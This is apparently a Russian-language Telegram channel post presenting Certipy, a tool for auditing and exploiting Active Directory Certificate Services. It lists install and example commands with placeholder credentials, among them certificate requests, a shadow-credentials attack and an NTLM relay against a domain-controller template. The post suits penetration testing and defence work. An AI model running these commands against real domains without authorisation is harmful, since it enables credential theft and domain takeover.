Certipy: Инструмент для аудита и эксплуатации служб сертификации Active Directory
🎇 Certipy предназначен как для наступательных, так и для защитных задач, связанных с Active Directory Certificate Services. Инструмент обеспечивает комплексный подход к оценке безопасности PKI-инфраструктуры Windows. Функции:
▶️ поиск центров сертификации (CA) и шаблонов сертификатов
▶️ автоматическое выявление misconfigurations (ESC1–ESC16)
▶️ создание сертификатов с заданными атрибутами
▶️ использование сертификатов для получения доступа
▶️ перехват и перенаправление NTLM-аутентификации на HTTP(S)/RPC-эндпоинты AD CS
⬇️ Установка
Проверка
⏺️ Перечисление AD CS (find)
⏺️ Сохранение результатов (флаг -output)
⏺️ Поиск уязвимостей (флаг -vulnerable)
⏺️ Запрос сертификата (req)
⏺️ Аутентификация по сертификату (auth)
⏺️ Управление сертификатами (cert)
⏺️ Shadow Credentials атака (shadow)
⏺️ Ретрансляция NTLM (relay)
⏺️ Справка по конкретной команде
👉 Ограничения
- для эксплуатации многих уязвимостей требуются базовые права доменного пользователя
- необходим доступ к LDAP (389/636), RPC (135/445) и HTTP(S) (80/443) портам CA
- зависимости (impacket, ldap3, pyopenssl, asn1crypto и другие библиотеки)
#ActiveDirectory #AD #LDAP #Certipy #tool #pentest #ADCS
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Certipy — инструмент для перечисления, анализа и эксплуатации уязвимостей служб сертификации Active Directory (AD CS). Разработан для профессионального тестирования на проникновение и защиты инфраструктур, поддерживает полный спектр известных атак (ESC1–ESC16) и предоставляет возможности для обнаружения, запроса, подделки сертификатов и ретрансляции аутентификации.
pipx install certipy-ad
Проверка
certipy-ad -h
certipy-ad find -u user@domain.local -p 'Password123!' -dc-ip 192.168.1.10
certipy-ad find -u user@domain.local -p 'Password123!' -dc-ip 192.168.1.10 -output results
certipy-ad find -u user@domain.local -p 'Password123!' -dc-ip 192.168.1.10 -vulnerable
certipy-ad req -u user@domain.local -p 'Password123!' -ca 'CA-SERVER' -template 'User'
certipy-ad auth -pfx user.pfx -dc-ip 192.168.1.10
certipy-ad cert -pfx user.pfx -password 'Password123!' -export
certipy-ad shadow -u user@domain.local -p 'Password123!' -target 'computer$' -dc-ip 192.168.1.10
certipy-ad relay -ca 192.168.1.10 -template 'DomainController'
certipy-ad find -h
- для эксплуатации многих уязвимостей требуются базовые права доменного пользователя
- необходим доступ к LDAP (389/636), RPC (135/445) и HTTP(S) (80/443) портам CA
- зависимости (impacket, ldap3, pyopenssl, asn1crypto и другие библиотеки)
#ActiveDirectory #AD #LDAP #Certipy #tool #pentest #ADCS
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍7❤5